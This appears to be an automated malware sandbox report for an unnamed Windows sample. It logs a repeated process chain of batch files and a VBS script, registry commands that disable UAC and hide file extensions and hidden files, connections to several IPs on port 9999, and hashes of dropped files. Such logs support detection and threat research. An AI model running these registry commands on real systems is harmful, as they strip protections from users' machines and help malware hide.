cmd /c ""C:\Users\Admin\AppData\Local\Temp\wIocwAUA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmowIgAk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tikIAoco.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XAwMsssE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RuUckkEk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RkooYoQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RCosMUck.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NIssgkQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

Network

Country Destination Domain Proto
BO 200.87.164.69:9999 tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 142.251.36.46:80 google.com tcp
NL 142.251.36.46:80 google.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files

memory/1572-54-0x0000000075D11000-0x0000000075D13000-memory.dmp

\Users\Admin\hYgwkYwM\QgAscQoI.exe

MD5 9dff3452022befb206f015c6f80589e0
SHA1 de5acdcfa01345e4d033b8c9f9443cf1cfb75180
SHA256 967bb0265c7e1a830467c5d14b5ddebd09fc8d277d269fd16aa01be015e7e0b0
SHA512 e6bce9d5a2f79cd9d625a84822383628ddc97beaf85ccb4d47b7cd12c5edf16016f0ac084bd65ec96e6a6318fd7ce6e8667cab65ec076681b28c3d3d842a0294

\Users\Admin\hYgwkYwM\QgAscQoI.exe

MD5 9dff3452022befb206f015c6f80589e0
SHA1 de5acdcfa01345e4d033b8c9f9443cf1cfb75180
SHA256 967bb0265c7e1a830467c5d14b5ddebd09fc8d277d269fd16aa01be015e7e0b0
SHA512 e6bce9d5a2f79cd9d625a84822383628ddc97beaf85ccb4d47b7cd12c5edf16016f0ac084bd65ec96e6a6318fd7ce6e8667cab65ec076681b28c3d3d842a0294

C:\Users\Admin\hYgwkYwM\QgAscQoI.exe

MD5 9dff3452022befb206f015c6f80589e0
SHA1 de5acdcfa01345e4d033b8c9f9443cf1cfb75180
SHA256 967bb0265c7e1a830467c5d14b5ddebd09fc8d277d269fd16aa01be015e7e0b0
SHA512 e6bce9d5a2f79cd9d625a84822383628ddc97beaf85ccb4d47b7cd12c5edf16016f0ac084bd65ec96e6a6318fd7ce6e8667cab65ec076681b28c3d3d842a0294

\ProgramData\DmwYMgQc\PKsMQUYQ.exe

MD5 3be99b7b258fa201572ae7757ed5ff5e
SHA1 3b070fe8c5635be98de277303f0f3c9fedeb9d69
SHA256 b270e6c3d178fb23f8551ce49c6bf3ef7c69d9fe0141cace2ecb59c66142619c
SHA512 b0e34f95c1df6060785268c8cfd4a6378e3671e8caf2f9ba00d395c40c71456b3ce85cb716d98779004d2a0722d39c8ff81e60939ec7f38841f3d0b9789790f2

\ProgramData\DmwYMgQc\PKsMQUYQ.exe

MD5 3be99b7b258fa201572ae7757ed5ff5e
SHA1 3b070fe8c5635be98de277303f0f3c9fedeb9d69
SHA256 b270e6c3d178fb23f8551ce49c6bf3ef7c69d9fe0141cace2ecb59c66142619c
SHA512 b0e34f95c1df6060785268c8cfd4a6378e3671e8caf2f9ba00d395c40c71456b3ce85cb716d98779004d2a0722d39c8ff81e60939ec7f38841f3d0b9789790f2

C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe

MD5 3be99b7b258fa201572ae7757ed5ff5e
SHA1 3b070fe8c5635be98de277303f0f3c9fedeb9d69
SHA256 b270e6c3d178fb23f8551ce49c6bf3ef7c69d9fe0141cace2ecb59c66142619c
SHA512 b0e34f95c1df6060785268c8cfd4a6378e3671e8caf2f9ba00d395c40c71456b3ce85cb716d98779004d2a0722d39c8ff81e60939ec7f38841f3d0b9789790f2

memory/1572-63-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AUwAQEUk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1400-70-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JuUQAEgM.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1600-76-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1064-80-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NmMQogAg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1224-86-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NkMIMssg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1464-92-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JUggIQEk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/900-96-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dCsQkskY.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1892-103-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wyQEgkcE.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1948-109-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KcUkIQsw.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 0de967a49dc8d61fc3e22e7a174000e7
SHA1 fe497ab942df3aad985d91b2125db233d55937a5
SHA256 0c9bb5da559b098006e5f0081ee964263d963a556cd7d196bc3af8445d00c9f5
SHA512 2a3608012ac5938cdac05cdccdae8003091f3e940a16c8e65d130c3ee7a706f4b54e13f20c9fbacde21cc52db9b3c462e41692abeb259f57212e3c46f9678f11

memory/1464-116-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GgcsscgA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 0de967a49dc8d61fc3e22e7a174000e7
SHA1 fe497ab942df3aad985d91b2125db233d55937a5
SHA256 0c9bb5da559b098006e5f0081ee964263d963a556cd7d196bc3af8445d00c9f5
SHA512 2a3608012ac5938cdac05cdccdae8003091f3e940a16c8e65d130c3ee7a706f4b54e13f20c9fbacde21cc52db9b3c462e41692abeb259f57212e3c46f9678f11

memory/1368-123-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ASoMwQUc.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 65cf81f0eb0866bd4154d65515ce9124
SHA1 a19c7e255fccd222fc7fe20625710f31fdeb681c
SHA256 6a558ce7022186108c79edebc0bc97925e8e4296d15aa8abe31ea8da93439e1f
SHA512 de0ac6194fd13e01f360482b1a5d5909710274d920ef8fbfe9bd71bad1358b35485d21bbeee9b695b7fd9d647df1e26face6fc6fda2c314a06aa468c5f402f13

memory/1900-130-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Ekgookws.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1056-137-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 65cf81f0eb0866bd4154d65515ce9124
SHA1 a19c7e255fccd222fc7fe20625710f31fdeb681c
SHA256 6a558ce7022186108c79edebc0bc97925e8e4296d15aa8abe31ea8da93439e1f
SHA512 de0ac6194fd13e01f360482b1a5d5909710274d920ef8fbfe9bd71bad1358b35485d21bbeee9b695b7fd9d647df1e26face6fc6fda2c314a06aa468c5f402f13

C:\Users\Admin\AppData\Local\Temp\ViwcYAMA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

